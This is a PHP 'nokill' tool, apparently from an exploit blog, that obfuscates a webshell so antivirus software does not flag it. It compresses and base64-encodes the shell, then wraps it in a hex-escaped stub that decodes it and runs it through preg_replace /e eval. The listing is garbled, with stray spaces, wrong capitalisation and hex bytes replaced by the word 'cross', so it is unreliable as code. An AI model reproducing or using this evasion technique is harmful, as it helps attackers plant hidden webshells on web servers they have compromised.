Php-written webshell code with powerful kill-free tools
- /*
- Title: PHP shell nokill T00L
- Blog: exploit-db.blogcn.com
- */
- Error_reporting (0 );
- @ Ini_set ('memory _ limit ','-1 ');
- Set_time_limit (0 );
- $ Toolname = "$ argv [0]";
- If ($ argc <2 ){
- Baner ($ toolname );
- Die;
- }
- $ Input_file = trim ($ argv [1]);
- $ Output_file = 'nokill _ '. $ input_file;
- If (file_exists ($ input_file )){
- No_kill_c0de ($ input_file, $ output_file );
- Echo "PHP shell nokill T00L \ r \ n ";
- Echo "Blog: exploit-db.blogcn.com \ r \ n ";
- Echo "Input: {$ input_file} \ r \ n ";
- $ File_full_path = dirname (_ FILE _). DIRECTORY_SEPARATOR. $ output_file;
- Echo "[+] Generate success! \ R \ n ";
- Echo "Saved to {$ file_full_path}". "\ r \ n ";
- } Else {
- Echo "PHP shell nokill T00L \ r \ n ";
- Echo "Blog: exploit-db.blogcn.com \ r \ n ";
- Die ("[-] Failed! The File $ input_file does not exist ");
- }
- Function No_kill_c0de ($ input_file, $ output_file ){
- $ No_whitespace = php_strip_whitespace ($ input_file );
- $ No_php_tag = trim ($ no_whitespace ,' ');
- $ Enfile = base64_encode (gzdeflate ($ no_php_tag ));
- $ Shellcode = "\ x3c \ x3f \ cross \ x68 \ cross \ xd \ xa ";
- $ Shellcode. = '$ enfile ='. '"'." {$ enfile} ". '"'. ';'. "\ xd \ xa ";
- $ Shellcode. = "\ x24 \ x62 \ x3d \ x73 \ x74 \ x72 \ x5f \ x72 \ x65 \ cross 7 \ x6c \ x61 \ x63 \ x65 \ x28 \ x27 \ x66 \ x27 \ x2c \ x22 \ x22 \ x2c \ x22 \ x62 \ x66 \ x61 \ x66 \ x73 \ x66 \ x65 \ x66 \ x36 \ x66 \ x34 \ x66 \ x5f \ x66 \ x66 \ x64 \ x66 \ x66 \ x65 \ x66 \ x66 \ x63 \ x66 \ x66 \ x6f \ x66 \ x66 \ x64 \ x66 \ x66 \ x65 \ x66 \ x22 \ x29 \ x3b \ xd \ xa \ x24 \ x67 \ x3d \ x73 \ x74 \ x72 \ x5f \ x72 \ x65 \ cross 7 \ x6c \ x61 \ x63 \ x65 \ x28 \ x27 \ x58 \ x27 \ x2c \ x27 \ x27 \ x2c \ x27 \ x67 \ x58 \ x58 \ x7a \ x58 \ x58 \ x69 \ x58 \ x58 \ x6e \ x58 \ x58 \ x58 \ x58 \ x66 \ x58 \ x58 \ x58 \ x6c \ x58 \ x58 \ x61 \ x58 \ x58 \ x58 \ x74 \ x58 \ x58 \ x58 \ x58 \ x58 \ x65 \ x27 \ x29 \ x3b \ xd \ xa \ cross \ x72 \ x65 \ x67 \ x5f \ x72 \ x65 \ cross \ x6c \ x61 \ x63 \ x65 \ x28 \ x27 \ x5c \ x27 \ x61 \ x5c \ x27 \ x65 \ x69 \ x73 \ x27 \ x2c \ x27 \ x65 \ x27 \ x2e \ x27 \ x76 \ x27 \ x2e \ x27 \ x61 \ x27 \ x2e \ x27 \ x6c \ x27 \ x2e \ x27 \ x28 \ x24 \ x67 \ x28 \ x24 \ x62 \ x28 \ x24 \ x65 \ x6e \ x66 \ x69 \ x6c \ x65 \ x29 \ x29 \ x29 \ x27 \ x2c \ x27 \ x61 \ x27 \ x29 \ x3b \ xd \ xa ";
- $ Shellcode. = "\ x3f \ x3e ";
- File_put_contents ("$ output_file", $ shellcode );
- }
- Function baner ($ toolname ){
- Echo "PHP shell nokill T00L \ r \ n ";
- Echo "Blog: exploit-db.blogcn.com \ r \ n ";
- Echo "Usage: {$ toolname} phpwebshell \ r \ n ";
- }
- ?>
|